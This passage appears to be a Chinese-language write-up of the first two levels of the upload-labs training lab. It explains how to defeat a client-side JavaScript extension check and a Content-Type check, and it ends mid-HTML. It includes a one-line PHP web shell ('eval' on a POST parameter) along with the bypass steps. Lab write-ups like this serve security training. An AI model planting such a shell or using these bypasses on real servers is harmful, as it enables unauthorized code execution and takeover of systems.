upload-labs
01 前端js绕过
ctrl+u查看源码
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name) == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
将var allow_ext = ".jpg|.png|.gif";
改为var allow_ext = ".jpg|.png|.gif|.php";
,用chrome浏览器,F12
打开dev tool,在console里黏贴checkFile
函数,执行checkFile
即可上传php。
<!-- test.php -->
<?php
@eval($_POST['cmd']);
?>
02 MIME绕过(1)
服务端MIME类型检测也就是检测Content-Type
的内容
Content-Type: application/octet-stream
Content-Type: image/jpeg
抓取正常的图片流量,与源码对比
抓包
Content-Disposition: form-data; name="upload_file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Disposition: form-data; name="submit"
ctrl+u:源码
<input class="input_file"